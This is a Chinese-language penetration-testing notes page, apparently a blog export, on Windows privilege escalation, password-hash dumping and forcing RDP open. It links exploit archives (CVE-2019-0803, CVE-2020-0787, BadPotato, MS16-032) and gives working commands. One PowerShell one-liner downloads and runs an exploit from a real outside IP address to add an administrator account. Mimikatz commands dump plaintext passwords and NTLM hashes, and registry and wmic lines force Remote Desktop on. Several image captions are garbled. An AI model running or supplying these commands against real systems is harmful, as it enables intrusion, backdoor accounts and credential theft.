                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1595926383488-cba9dd90-c184-4dc5-aa78-59a2be84eb96.png#align=left&display=inline&height=267&margin=%5Bobject%20Object%5D&name=image.png&originHeight=534&originWidth=1443&size=142491&status=done&style=none&width=721.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="梼杌taowu-cobalt-strike-master-zip"><a href="#梼杌taowu-cobalt-strike-master-zip" class="headerlink" title="梼杌taowu-cobalt-strike-master.zip"></a><a href="https://github.com/pandasec888/taowu-cobalt-strike" target="_blank" rel="noopener">梼杌</a><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365152-637cd483-0c06-4744-8d0b-36220837c966.zip?_lake_card=%7B%22uid%22%3A%221596166612030-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365152-637cd483-0c06-4744-8d0b-36220837c966.zip%22%2C%22name%22%3A%22taowu-cobalt-strike-master.zip%22%2C%22size%22%3A20362697%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22Y90Oz%22%2C%22card%22%3A%22file%22%7D">taowu-cobalt-strike-master.zip</a></h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596166663037-e40046b4-b8b9-4e95-a672-7b79a10c4806.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1543&size=290531&status=done&style=none&width=771.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="提权完成标志"><a href="#提权完成标志" class="headerlink" title="提权完成标志"></a>提权完成标志</h2><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596607756437-39ba810f-575a-4c48-b6a2-e4483dc9f953.png#align=left&display=inline&height=414&margin=%5Bobject%20Object%5D&name=image.png&originHeight=827&originWidth=1542&size=272848&status=done&style=none&width=771" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="MSF-提权"><a href="#MSF-提权" class="headerlink" title="MSF 提权"></a>MSF 提权</h1><h1 id="常规提权"><a href="#常规提权" class="headerlink" title="常规提权"></a>常规提权</h1><h2 id="CVE-2019-0803CVE-2019-0803-zip"><a href="#CVE-2019-0803CVE-2019-0803-zip" class="headerlink" title="CVE-2019-0803CVE-2019-0803.zip"></a>CVE-2019-0803<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365243-0e40e977-81fb-4120-bb58-241964f6b17a.zip?_lake_card=%7B%22uid%22%3A%221595957736015-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365243-0e40e977-81fb-4120-bb58-241964f6b17a.zip%22%2C%22name%22%3A%22CVE-2019-0803.zip%22%2C%22size%22%3A419444%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22kpcdq%22%2C%22card%22%3A%22file%22%7D">CVE-2019-0803.zip</a></h2><p>1、查看一下当前用户发现是普通用户无法建立新的用户。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000779952-4cd72eaa-5b05-4eb8-be46-d00f0b1beb26.png#align=left&display=inline&height=147&margin=%5Bobject%20Object%5D&name=image.png&originHeight=294&originWidth=768&size=150643&status=done&style=none&width=384" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>2、把上传的 CVE-2019-0803 拖进 cmd 里，创建新用户 zz</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000890644-6078e18e-ef93-4d8d-9824-603238f194b9.png#align=left&display=inline&height=398&margin=%5Bobject%20Object%5D&name=image.png&originHeight=796&originWidth=686&size=442463&status=done&style=none&width=343" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="CVE-2020-0787BitsArbitraryFileMoveExploit-zip"><a href="#CVE-2020-0787BitsArbitraryFileMoveExploit-zip" class="headerlink" title="CVE-2020-0787BitsArbitraryFileMoveExploit.zip"></a><a href="https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION/releases" target="_blank" rel="noopener">CVE-2020-0787</a><a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365369-9ac6e696-ee40-4429-a7af-dcff5d8498de.zip?_lake_card=%7B%22uid%22%3A%221596000370507-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365369-9ac6e696-ee40-4429-a7af-dcff5d8498de.zip%22%2C%22name%22%3A%22BitsArbitraryFileMoveExploit.zip%22%2C%22size%22%3A241372%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22ezOv8%22%2C%22card%22%3A%22file%22%7D">BitsArbitraryFileMoveExploit.zip</a></h2><p>1、创建一个普通用户 net user test test123.. /add 并登入</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000469388-84118202-63c8-4b65-9ce5-04dadf7a83d9.png#align=left&display=inline&height=214&margin=%5Bobject%20Object%5D&name=image.png&originHeight=429&originWidth=837&size=302009&status=done&style=none&width=418.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>查看当前用户为 test 并上传 exe 运行</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000424542-fc3ea812-cffd-42e3-916e-df3a180d6d28.png#align=left&display=inline&height=224&margin=%5Bobject%20Object%5D&name=image.png&originHeight=448&originWidth=843&size=290122&status=done&style=none&width=421.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="ms16-32-还未测试-Invoke-MS16-032-ps1"><a href="#ms16-32-还未测试-Invoke-MS16-032-ps1" class="headerlink" title="ms16-32(还未测试)Invoke-MS16-032.ps1"></a>ms16-32(还未测试)<a href="https://www.yuque.com/attachments/yuque/0/2020/ps1/258143/1596725365474-d1a3053e-a5f6-4dd5-b550-c6ba77af084b.ps1?_lake_card=%7B%22uid%22%3A%221596011138011-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fps1%2F258143%2F1596725365474-d1a3053e-a5f6-4dd5-b550-c6ba77af084b.ps1%22%2C%22name%22%3A%22Invoke-MS16-032.ps1%22%2C%22size%22%3A15291%2C%22type%22%3A%22%22%2C%22ext%22%3A%22ps1%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22r2T9i%22%2C%22card%22%3A%22file%22%7D">Invoke-MS16-032.ps1</a></h2><h4 id="本地提权"><a href="#本地提权" class="headerlink" title="本地提权"></a>本地提权</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">powershell</span><br><span class="line"><span class="built_in">Invoke-MS16</span><span class="literal">-032</span>.ps1 <span class="literal">-Application</span> cmd.exe <span class="literal">-commandline</span> <span class="string">"/c net user evi1cg test123 /add"</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596009266490-76f7778a-1f4f-47e3-b0d0-93b12565bb24.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=356325576.gif&originHeight=650&originWidth=979&size=670606&status=done&style=none&width=979" alt="356325576.gif" title="">
                </div>
                <div class="image-caption">356325576.gif</div>
            </figure>

<h4 id="远程给加载提权"><a href="#远程给加载提权" class="headerlink" title="远程给加载提权"></a>远程给加载提权</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell <span class="literal">-nop</span> <span class="literal">-exec</span> bypass <span class="literal">-c</span> <span class="string">"IEX (New-Object Net.WebClient).DownloadString('http://122.51.93.116Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"</span></span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/gif/258143/1596010859066-bacecdf1-6edb-4583-b67c-679a78109ab8.gif#align=left&display=inline&height=650&margin=%5Bobject%20Object%5D&name=2.gif&originHeight=650&originWidth=979&size=782929&status=done&style=none&width=979" alt="2.gif" title="">
                </div>
                <div class="image-caption">2.gif</div>
            </figure>

<h2 id="dazzleUP（漏洞检测）dazzleUP-zip"><a href="#dazzleUP（漏洞检测）dazzleUP-zip" class="headerlink" title="dazzleUP（漏洞检测）dazzleUP.zip"></a>dazzleUP（漏洞检测）<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365591-daced9d9-ef39-4497-9415-d455b1cd84cb.zip?_lake_card=%7B%22uid%22%3A%221596093918251-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365591-daced9d9-ef39-4497-9415-d455b1cd84cb.zip%22%2C%22name%22%3A%22dazzleUP.zip%22%2C%22size%22%3A512950%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22tIZCl%22%2C%22card%22%3A%22file%22%7D">dazzleUP.zip</a></h2><p>适用：win 10</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">DCOM&#x2F;NTLM Reflection (Rotten&#x2F;Juicy Potato) Vulnerability</span><br><span class="line">CVE-2019-0836</span><br><span class="line">CVE-2019-0841</span><br><span class="line">CVE-2019-1064</span><br><span class="line">CVE-2019-1130</span><br><span class="line">CVE-2019-1253</span><br><span class="line">CVE-2019-1385</span><br><span class="line">CVE-2019-1388</span><br><span class="line">CVE-2019-1405</span><br><span class="line">CVE-2019-1315</span><br><span class="line">CVE-2020-0787</span><br><span class="line">CVE-2020-0796</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596093953631-d24a84b5-576c-46f2-aeb2-f5438eb9286d.png#align=left&display=inline&height=271&margin=%5Bobject%20Object%5D&name=image.png&originHeight=542&originWidth=1199&size=340191&status=done&style=none&width=599.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="BadPotato-提权Release-zip"><a href="#BadPotato-提权Release-zip" class="headerlink" title="BadPotato 提权Release.zip"></a>BadPotato 提权<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365769-d757d901-a232-4942-b54f-c495a0e89fe5.zip?_lake_card=%7B%22uid%22%3A%221596109729829-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365769-d757d901-a232-4942-b54f-c495a0e89fe5.zip%22%2C%22name%22%3A%22Release.zip%22%2C%22size%22%3A48177%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%229jImj%22%2C%22card%22%3A%22file%22%7D">Release.zip</a></h2><p>适用：Windows 2012-2019<br>Windows 8-10<br>注意：命令中有空格需要通过””括起来，此工具为.net 版本，在蚁剑和 cs 上提权成功。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110356894-42232318-6562-45fd-9eb2-4633ed105948.png#align=left&display=inline&height=56&margin=%5Bobject%20Object%5D&name=image.png&originHeight=112&originWidth=744&size=9918&status=done&style=none&width=372" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596110176792-e82ae15d-5951-40e8-a6f1-b88ee2ab5f60.png#align=left&display=inline&height=360&margin=%5Bobject%20Object%5D&name=image.png&originHeight=720&originWidth=710&size=60918&status=done&style=none&width=355" alt="image.png](https://cdn.nlark.com/yuque/0/2020/png/258143/1596110263454-a6d437d7-0b13-4f4f-8a18-c33e1ae1f2a9.png#align=left&display=inline&height=362&margin=%5Bobject%20Object%5D&name=image.png&originHeight=723&originWidth=699&size=59230&status=done&style=none&width=349.5)![image.png" title="">
                </div>
                <div class="image-caption">image.png](https://cdn.nlark.com/yuque/0/2020/png/258143/1596110263454-a6d437d7-0b13-4f4f-8a18-c33e1ae1f2a9.png#align=left&display=inline&height=362&margin=%5Bobject%20Object%5D&name=image.png&originHeight=723&originWidth=699&size=59230&status=done&style=none&width=349.5)![image.png</div>
            </figure>

<h1 id="提权查询"><a href="#提权查询" class="headerlink" title="提权查询"></a><a href="http://blog.neargle.com/win-powerup-exp-index/" target="_blank" rel="noopener">提权查询</a></h1><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596000569316-64cbe683-6fb9-41eb-bb90-8196371282ef.png#align=left&display=inline&height=368&margin=%5Bobject%20Object%5D&name=image.png&originHeight=736&originWidth=1388&size=99563&status=done&style=none&width=694" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="Hash-读取（管理员权限）"><a href="#Hash-读取（管理员权限）" class="headerlink" title="Hash 读取（管理员权限）"></a><a href="https://mp.weixin.qq.com/s?__biz=MjM5NDUxMTI2NA==∣=2247484303&idx=1&sn=7733981a64299e061e495c98abe0370c&chksm=a687e34091f06a56da8c5a380a7a61b927bedc2300271aeea1c064b7bd4be75818d191c6f3f9&mpshare=1&scene=24&srcid=0804C7EJbROG2ZUgUqGMQH2x&sharer_sharetime=1596530942381&sharer_shareid=f082bd6e4afa0b021ff0cb8b0db46ed5&key=f87c13d2d4a2ca88180b96a094832ce7d6f09d526d33fa2b7db6ae9aa2482d922bb769db71edce5e5100f2c1d140355b7516cb0fd6ee8e40a18382eca5de2fdab676c9b5ac1de1609409d462aeedd71b&ascene=14&uin=OTc1NzE1Nzgw&devicetype=Windows+10+x64&version=6209007b⟨=zh_CN&exportkey=AxcDvN201rC9YrYyTiygSJE%3D&pass_ticket=Y88jPb%2BZ9uYCDXH78uMnNPj38c%2FKJPNlJoqwvp3IaMSZTV2j0PbBjShPOJ9GGbP4" target="_blank" rel="noopener">Hash 读取</a>（管理员权限）</h1><h2 id="使用-pwdump7-获取-hash"><a href="#使用-pwdump7-获取-hash" class="headerlink" title="使用 pwdump7 获取 hash"></a><strong>使用 pwdump7 获取 hash</strong></h2><h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><h4 id="hash-读取Pwdump7-zip"><a href="#hash-读取Pwdump7-zip" class="headerlink" title="hash 读取Pwdump7.zip"></a>hash 读取<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596725365891-1d0cf28f-223c-4720-b94f-269ca6e38313.zip?_lake_card=%7B%22uid%22%3A%221596604336670-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596725365891-1d0cf28f-223c-4720-b94f-269ca6e38313.zip%22%2C%22name%22%3A%22Pwdump7.zip%22%2C%22size%22%3A768486%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%225B65j%22%2C%22card%22%3A%22file%22%7D">Pwdump7.zip</a></h4><p>*<em>测试环境：win7、Win03、window08 *</em><br>1、将整个附件解压上传到靶机，否则会报错。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596604208017-b970f6a2-9ea9-4151-b062-2babcf0194f5.png#align=left&display=inline&height=111&margin=%5Bobject%20Object%5D&name=image.png&originHeight=222&originWidth=630&size=69607&status=done&style=none&width=315" alt="image.png](https://cdn.nlark.com/yuque/0/2020/png/258143/1596604183676-7189191c-7610-4946-99f6-87fab6ff5350.png#align=left&display=inline&height=101&margin=%5Bobject%20Object%5D&name=image.png&originHeight=201&originWidth=771&size=23007&status=done&style=none&width=386)![image.png" title="">
                </div>
                <div class="image-caption">image.png](https://cdn.nlark.com/yuque/0/2020/png/258143/1596604183676-7189191c-7610-4946-99f6-87fab6ff5350.png#align=left&display=inline&height=101&margin=%5Bobject%20Object%5D&name=image.png&originHeight=201&originWidth=771&size=23007&status=done&style=none&width=386)![image.png</div>
            </figure>
<p>执行 pwdump.exe，读取成功<br>win7</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605167992-81ee5259-2054-47d2-80c9-b7f93992ccf3.png#align=left&display=inline&height=145&margin=%5Bobject%20Object%5D&name=image.png&originHeight=290&originWidth=723&size=31801&status=done&style=none&width=361.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>Windows2008：<br>Windows2003：</p>
<h4 id="拿到-hash-直接破解："><a href="#拿到-hash-直接破解：" class="headerlink" title="拿到 hash 直接破解："></a><a href="https://www.cmd5.com/" target="_blank" rel="noopener">拿到 hash 直接破解</a>：</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596605194766-0e11828f-9540-42c4-bf4a-18a496b21141.png#align=left&display=inline&height=131&margin=%5Bobject%20Object%5D&name=image.png&originHeight=261&originWidth=825&size=13034&status=done&style=none&width=412.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="mimikatz-抓取-hash"><a href="#mimikatz-抓取-hash" class="headerlink" title="mimikatz 抓取 hash"></a><strong>mimikatz 抓取 hash</strong></h2><h4 id="执行命令mimikatz-trunk-zip"><a href="#执行命令mimikatz-trunk-zip" class="headerlink" title="执行命令mimikatz_trunk.zip"></a>执行命令<a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596877575881-7e6e65c8-7a2b-4817-8c3a-1daad6ec1549.zip?_lake_card=%7B%22uid%22%3A%221596877574622-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596877575881-7e6e65c8-7a2b-4817-8c3a-1daad6ec1549.zip%22%2C%22name%22%3A%22mimikatz_trunk.zip%22%2C%22size%22%3A1135477%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%2260MmQ%22%2C%22card%22%3A%22file%22%7D">mimikatz_trunk.zip</a></h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">mimikatz.exe</span><br><span class="line"></span><br><span class="line">#检测权限</span><br><span class="line">privilege::debug</span><br><span class="line"></span><br><span class="line">#抓取hash</span><br><span class="line">#获取当前在线用户的明文密码（需要高权限运行）</span><br><span class="line">sekurlsa::logonpasswords</span><br><span class="line"></span><br><span class="line">#获取当前此计算机存在过用户的NTLMHASH</span><br><span class="line">lsadump::lsa &#x2F;patch</span><br></pre></td></tr></table></figure>

<p><strong>权限符合则提示</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596891469135-620967c1-d803-4872-ae43-cfeaff5e3f6a.png#align=left&display=inline&height=133&margin=%5Bobject%20Object%5D&name=image.png&originHeight=265&originWidth=801&size=20220&status=done&style=none&width=400.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p><strong>测试：win7 环境下</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877277818-50b18d70-8d61-4439-9ffa-16db6fe5308d.png#align=left&display=inline&height=307&margin=%5Bobject%20Object%5D&name=image.png&originHeight=614&originWidth=838&size=41359&status=done&style=none&width=419" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877444914-f56ff8e1-37bb-4625-86be-75a323e50316.png#align=left&display=inline&height=359&margin=%5Bobject%20Object%5D&name=image.png&originHeight=718&originWidth=781&size=37748&status=done&style=none&width=390.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>window2008 用 getpassword.exe <a href="https://www.yuque.com/attachments/yuque/0/2020/zip/258143/1596878142955-6c57f92b-4af2-4fa3-907b-7a9caf951d90.zip?_lake_card=%7B%22uid%22%3A%221596878142457-0%22%2C%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2020%2Fzip%2F258143%2F1596878142955-6c57f92b-4af2-4fa3-907b-7a9caf951d90.zip%22%2C%22name%22%3A%22GetPass.zip%22%2C%22size%22%3A176299%2C%22type%22%3A%22application%2Fx-zip-compressed%22%2C%22ext%22%3A%22zip%22%2C%22progress%22%3A%7B%22percent%22%3A99%7D%2C%22status%22%3A%22done%22%2C%22percent%22%3A0%2C%22id%22%3A%22EJKDj%22%2C%22card%22%3A%22file%22%7D">GetPass.zip</a></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596878161275-a41963ad-fce9-4c76-aea7-0be5c57ebc31.png#align=left&display=inline&height=153&margin=%5Bobject%20Object%5D&name=image.png&originHeight=305&originWidth=1055&size=88821&status=done&style=none&width=527.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="如果权限不足则会提示"><a href="#如果权限不足则会提示" class="headerlink" title="如果权限不足则会提示"></a>如果权限不足则会提示</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596877960841-32d91383-e94e-4bae-a735-8643a3d32347.png#align=left&display=inline&height=78&margin=%5Bobject%20Object%5D&name=image.png&originHeight=156&originWidth=618&size=10573&status=done&style=none&width=309" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h2 id="MSF-抓取-hash"><a href="#MSF-抓取-hash" class="headerlink" title="MSF 抓取 hash"></a>MSF 抓取 hash</h2><h2 id="Cobalt-Strike-抓取-hash"><a href="#Cobalt-Strike-抓取-hash" class="headerlink" title="Cobalt Strike 抓取 hash"></a>Cobalt Strike 抓取 hash</h2><h4 id="1、抓取-hash（通过-cobalt-strike）"><a href="#1、抓取-hash（通过-cobalt-strike）" class="headerlink" title="1、抓取 hash（通过 cobalt strike）"></a>1、抓取 hash（通过 cobalt strike）</h4><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596608521335-f990db60-acfd-4de2-97f9-17ca8ba2726e.png#align=left&display=inline&height=332&margin=%5Bobject%20Object%5D&name=image.png&originHeight=664&originWidth=1920&size=59020&status=done&style=none&width=960" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h1 id="端口转发"><a href="#端口转发" class="headerlink" title="端口转发"></a>端口转发</h1><h2 id="MSF-端口转发"><a href="#MSF-端口转发" class="headerlink" title="MSF 端口转发"></a>MSF 端口转发</h2><h2 id="ew"><a href="#ew" class="headerlink" title="ew"></a>ew</h2><h2 id="常见问题解决办法"><a href="#常见问题解决办法" class="headerlink" title="常见问题解决办法"></a>常见问题解决办法</h2><h4 id="服务端口默认被修改"><a href="#服务端口默认被修改" class="headerlink" title="服务端口默认被修改"></a>服务端口默认被修改</h4><p>解决办法 ①：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#查询TermService对应PID和netstat查询的PID对应的端口号</span><br><span class="line">tasklist &#x2F;svc</span><br><span class="line">netstat -ano | findstr PID</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609640544-3e20638a-338e-4161-84e1-0c102c3b9d45.png#align=left&display=inline&height=274&margin=%5Bobject%20Object%5D&name=image.png&originHeight=547&originWidth=1059&size=186262&status=done&style=none&width=529.5" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>解决办法 ②：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#读取注册表查询终端端口PortNumber的值</span><br><span class="line">REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server\WinStations\RDP-Tcp &#x2F;v PortNumber</span><br></pre></td></tr></table></figure>

<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609726168-d450dd2b-e970-4422-9897-e48176916f36.png#align=left&display=inline&height=144&margin=%5Bobject%20Object%5D&name=image.png&originHeight=144&originWidth=1054&size=32038&status=done&style=none&width=1054" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>备注：0xd3d=hex(3389)</p>
<p>解决办法 ③：nnmap 探测(ms-wbt-server 服务)</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://cdn.nlark.com/yuque/0/2020/png/258143/1596609782138-e97f2179-d252-4a8f-a460-d384e1e6f469.png#align=left&display=inline&height=303&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=1059&size=147309&status=done&style=none&width=1059" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>

<h4 id="服务器未开启-3389"><a href="#服务器未开启-3389" class="headerlink" title="服务器未开启 3389"></a>服务器未开启 3389</h4><p>解决办法：强开 3389</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#通用开3389：</span><br><span class="line">wmic RDTOGGLE WHERE ServerName&#x3D;&#39;%COMPUTERNAME%&#39; call SetAllowTSConnections 1</span><br><span class="line"></span><br><span class="line">#For Win2003&amp;Win2008:</span><br><span class="line">REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal&quot; &quot;Server &#x2F;v fDenyTSConnections &#x2F;t REG_DWORD &#x2F;d 00000000 &#x2F;f</span><br><span class="line"></span><br><span class="line">#win2012&#x2F;win08通用；win7前两条适用。winxp&#x2F;win03未测验权限需要run as administrator:</span><br><span class="line">wmic &#x2F;namespace:\root\cimv2 erminalservices path win32_terminalservicesetting where (__CLASS !&#x3D; &quot;&quot;) call setallowtsconnections 1</span><br><span class="line">wmic &#x2F;namespace:\root\cimv2 erminalservices path win32_tsgeneralsetting where (TerminalName &#x3D;&#39;RDP-Tcp&#39;) call setuserauthenticationrequired 1</span><br><span class="line">reg add &quot;HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; &#x2F;v fSingleSessionPerUser &#x2F;t REG_DWORD &#x2F;d 0 